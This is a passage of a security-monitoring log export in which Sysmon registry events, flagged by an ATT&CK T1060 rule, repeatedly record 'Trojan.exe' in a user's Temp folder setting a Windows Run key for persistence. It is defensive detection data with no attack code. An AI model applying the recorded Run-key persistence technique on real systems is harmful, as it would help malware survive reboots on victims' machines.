13:25:50.361"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:23:02.349",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:49.346 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:49.352085800Z"",""eventRecordID"":""1550"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:49.346\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:25:49.346"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:00.506",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:48.331 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:48.333307200Z"",""eventRecordID"":""1548"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:48.331\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:48.331"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:00.475",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:47.314 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:47.363058900Z"",""eventRecordID"":""1546"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:47.314\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:47.314"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:22:59.524",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:46.283 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:46.289162000Z"",""eventRecordID"":""1545"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:46.283\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:25:46.283"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:58.540",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:45.252 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:45.257349000Z"",""eventRecordID"":""1543"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:45.252\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:45.252"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:58.443",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:44.237 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:44.239767200Z"",""eventRecordID"":""1537"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:44.237\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:44.237"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:22:58.396",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:43.221 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:43.224771900Z"",""eventRecordID"":""1536"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:43.221\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:25:43.221"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:55.341",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:42.206 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:42.206897300Z"",""eventRecordID"":""1534"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:42.206\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:42.206"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:53.708",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:41.189 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:41.196994800Z"",""eventRecordID"":""1533"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:41.189\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:41.189"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:22:52.336",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:40.174 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:40.180978500Z"",""eventRecordID"":""1530"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:40.174\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:25:40.174"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:52.318",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:39.158 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:39.191709000Z"",""eventRecordID"":""1529"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:39.158\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
